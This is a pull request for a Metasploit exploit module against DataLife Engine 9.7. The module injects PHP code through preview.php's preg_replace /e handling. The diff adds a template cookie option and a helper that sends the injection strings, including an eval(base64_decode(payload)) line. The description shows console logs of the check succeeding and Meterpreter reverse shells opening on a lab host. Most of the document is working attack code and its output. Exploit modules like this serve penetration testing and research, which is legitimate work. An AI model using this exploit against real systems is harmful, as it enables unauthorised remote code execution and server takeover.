### PR TITLE
added template stuff improve

### DIFF
--- a/modules/exploits/unix/webapp/datalife_preview_exec.rb
+++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb
@@ -18,8 +18,10 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Description'    => %q{
 					This module exploits a PHP code injection vulnerability DataLife Engine 9.7.
 				The vulnerability exists in preview.php, due to an insecure usage of preg_replace()
-				with the e modifier, which allows to inject arbitrary php code, when the template
-				in use contains a [catlist] or [not-catlist] tag.
+				with the e modifier, which allows to inject arbitrary php code, when there is a
+				template installed which contains a [catlist] or [not-catlist] tag, even when the
+				template isn't in use currently. The template can be configured with the TEMPLATE
+				datastore option.
 			},
 			'Author'         =>
 				[
@@ -49,7 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		register_options(
 			[
-				OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
+				OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]),
+				OptString.new('TEMPLATE', [ true, "Template with catlist or not-catlit tag", "Default"])
 			], self.class)
 	end
 
@@ -57,17 +60,24 @@ class Metasploit3 < Msf::Exploit::Remote
 		normalize_uri(target_uri.path, 'engine', 'preview.php')
 	end
 
-	def check
-		fingerprint = rand_text_alpha(4+rand(4))
+	def send_injection(inj)
 		res = send_request_cgi(
 			{
 				'uri'       =>  uri,
 				'method'    => 'POST',
 				'vars_post' =>
 					{
-						'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//"
-					}
+						'catlist[0]' => inj
+					},
+				'cookie'   => "dle_skin=#{datastore['TEMPLATE']}"
 			})
+		res
+	end
+
+	def check
+		fingerprint = rand_text_alpha(4+rand(4))
+
+		res = send_injection("#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//")
 
 		if res and res.code == 200 and res.body =~ /#{fingerprint}/
 			return Exploit::CheckCode::Vulnerable
@@ -80,14 +90,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		@peer = "#{rhost}:#{rport}"
 
 		print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")
-		res = send_request_cgi(
-			{
-				'uri'       =>  uri,
-				'method'    => 'POST',
-				'vars_post' =>
-					{
-						'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//"
-					}
-			})
+		res = send_injection("#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//")
 	end
 end


### PR DESCRIPTION
According to EgiX, it isn't needed which the vulnerable template is in use, its sufficient if there its installed, since the template can be specified with the dle_skin cookie parameter. The module has been modified to have it into account.
- Vulnerable template (Default):

```
msf > use exploit/unix/webapp/datalife_preview_exec 
msf  exploit(datalife_preview_exec) > reload
[*] Reloading module...
msf  exploit(datalife_preview_exec) > show options

Module options (exploit/unix/webapp/datalife_preview_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        Use a proxy chain
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the web application
   TEMPLATE   Default          yes       Template with catlist or not-catlit tag
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   DataLife Engine 9.7


msf  exploit(datalife_preview_exec) > set TARGETURI /upload
TARGETURI => /upload
msf  exploit(datalife_preview_exec) > set RHOST 192.168.1.131
RHOST => 192.168.1.131
msf  exploit(datalife_preview_exec) > check
[+] The target is vulnerable.
msf  exploit(datalife_preview_exec) > exploit

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.131:80 - Exploiting the preg_replace() to execute PHP code
[*] Sending stage (39217 bytes) to 192.168.1.131
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.131:42124) at 2013-02-01 11:50:19 +0100
^C[-] Exploit failed: Interrupt 

meterpreter > exit
[*] Shutting down Meterpreter...


```
- Not vulnerable template (juan):

```

msf  exploit(datalife_preview_exec) > set TEMPLATE juan
TEMPLATE => juan
msf  exploit(datalife_preview_exec) > check
[*] The target is not exploitable.
msf  exploit(datalife_preview_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.131:80 - Exploiting the preg_replace() to execute PHP code
[*] Exploit completed, but no session was created.
msf  exploit(datalife_preview_exec) > set TEMPLATE Default
TEMPLATE => Default
msf  exploit(datalife_preview_exec) > check
[+] The target is vulnerable.
msf  exploit(datalife_preview_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.131:80 - Exploiting the preg_replace() to execute PHP code
[*] Sending stage (39217 bytes) to 192.168.1.131
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.131:42125) at 2013-02-01 11:51:48 +0100
^C[-] Exploit failed: Interrupt 

meterpreter > exit

```
